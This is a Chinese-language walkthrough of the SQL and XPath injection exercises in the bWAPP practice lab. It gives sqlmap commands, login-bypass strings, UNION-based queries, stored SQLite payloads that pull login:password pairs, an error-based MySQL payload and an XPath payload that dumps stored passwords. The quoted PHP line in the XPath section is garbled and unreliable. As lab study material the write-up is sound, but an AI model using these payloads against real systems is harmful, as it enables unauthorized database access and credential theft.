文章目录

SQL Injection (GET/Search)

SQL Injection (GET/Select)

SQL Injection (POST/Search)

SQL Injection (POST/Select)

SQL Injection (AJAX/JSON/jQuery)

SQL Injection (CAPTCHA)

SQL Injection (Login Form/Hero)

SQL Injection (Login Form/User)

SQL Injection (SQLite)

SQL Injection – Stored (Blog)

SQL Injection – Stored (SQLite)

SQL Injection – Stored (User-Agent)

SQL Injection – Stored (XML)

XML/XPath Injection (Login Form)

XML/XPath Injection (Search)

SQL Injection (GET/Search)

这里的题都可以用sqlmap解决
sqlmap详解，可以参考这篇文章

构造sqlmap -u "http://192.168.41.137/sqli_1.php?title=a&action=search" -p title --cookie "security_level=0; PHPSESSID=bsmemp4vk1015lbju2csqchr63"
这里需要加cooike值，靶场需要登录
然后就会自动构造

SQL Injection (GET/Select)

使用order by 尝试可知，能试到7，
使用联合查询试一下，可以，然后就开始查库，查表，查列

SQL Injection (POST/Search)

使用了post传参而已
解决方法和get一样

SQL Injection (POST/Select)

通过抓包可以知道，不仅是post传参，而且title改成了movie,
解决方法一样

SQL Injection (AJAX/JSON/jQuery)

首先解释一下AJAX,Ajax 即“Asynchronous Javascript And XML”（异步 JavaScript 和 XML），通过在后台与服务器进行少量数据交换，Ajax 可以使网页实现异步更新。这意味着可以在不重新加载整个网页的情况下，对网页的某部分进行更新。比如我们使用百度的时候，有个功能叫“搜索预测”，当你输入第一个字的时候，下拉框里就会出现大量可能的关键词候选，这个用的就是ajax技术，而它的返回值一般是json/xml格式的，jQuery中提供实现ajax的方法（因为js很容易捕捉客户端的按键行为）

抓包推断输入的a是get传参方法，但
URL为sqli_10-2.php?title=a但是实际浏览器看到的页面是，sqli_10-1.php,观察源代码发现

sqli_10-1.php将参数通过getJSON方法传给sqli_10-2.php，sqli_10-2.php立马执行查询，所以真正的注入点在sqli_10-2.php的title参数
当然，sqlmap能解决

SQL Injection (CAPTCHA)

进入后，直接输点东西，观看url，即可知道点在哪里

SQL Injection (Login Form/Hero)

用sql语句构造绕过，
admin
aa ' or 'a' = 'a
这是我采用的一种写法

用sqlmap的话，
这样构造
sqlmap -u "http://192.168.248.130/bWAPP/sqli_3.php" --data "login=111&password=111&form=submit" --cookie "security_level=0; PHPSESSID=5913f596beeaf73e40495ff8037750a9" -p login
用给定的payload进行post注入

SQL Injection (Login Form/User)

order by 先爆破
当为9的时候

当为10的时候，

因此我们就可以相信他是9
' UNION SELECT 1,2,3,4,5,6,7,8,9#在使用联合查询爆破回显位
但尝试后感觉不行,最后搜索到的大佬是这样写的
' UNION SELECT 1,2,'356a192b7913b04c54574d18c28d46e6395428ab',4,5,6,7,8,9#
原因http://www.mamicode.com/info-detail-2239051.html

SQL Injection (SQLite)

SQLite 简介

SQLite是一个软件库，实现了自给自足的、无服务器的、零配置的、事务性的 SQL
数据库引擎。SQLite是一个增长最快的数据库引擎，这是在普及方面的增长，与它的尺寸大小无关。SQLite 源代码不受版权限制。

sqlmap可以解决

SQL Injection – Stored (Blog)

用sqlmap将post参数加上去

SQL Injection – Stored (SQLite)

meetsec’,’’);
meetsec’,sqlite_version());
meetsec’,(select name from sqlite_master where type=‘table’));
meetsec’,(select login||”:”||password from users)) – –
新的独立的注入方法

SQL Injection – Stored (User-Agent)

抓包，修改UA为单引号，出现报错
继续
1' ,(select version()))#
1' ,(select user()))#,这样都可以查询到

SQL Injection – Stored (XML)

构造post参数
bee'+(select 1 and row(1,1)>(select count(*),concat(CONCAT((SELECT @@version)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'bee'+(select 1 and row(1,1)>(select count(*),concat(CONCAT((SELECT @@version)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'

XML/XPath Injection (Login Form)

XPath其实和sql查询挺像，区别在于sql查询是在数据库中查数据，Xpath是在xml中找信息，既然如此只要熟悉一下Xpath的语法，知道它的特点即可找到对应的注入思路

在 XPath 中，有七种类型的节点：元素、属性、文本、命名空间、处理指令、注释以及文档节点（或称为根节点）。节点之间存在父、子、先辈、后代、同胞关系，以t3stt3st.xml为例
根节点 、元素节点、属性节点name='user1'
是和的父节点，同时也是的先辈。和是同胞节点。

构造meetset' or '1'='1,成功

XML/XPath Injection (Search)

$xml = simplexml_load_file(“passwords/heroes.xml”);

// XPath search // result = x m l − > x p a t h ( ” / / h e r o [ g e n r e = ′ xml->xpath(“//hero[genre = ‘ xml−>xpath(“//hero[genre=′genre’]/movie”);

那么我们补全我们需要但他所缺乏的 构造payload')]/password | a[contains(a,' 这样完整的语句就是 result = xml->xpath("//hero[contains(genre, '')]/password | a[contains(a,'')]/movie"); 即 result = xml->xpath("//hero/password");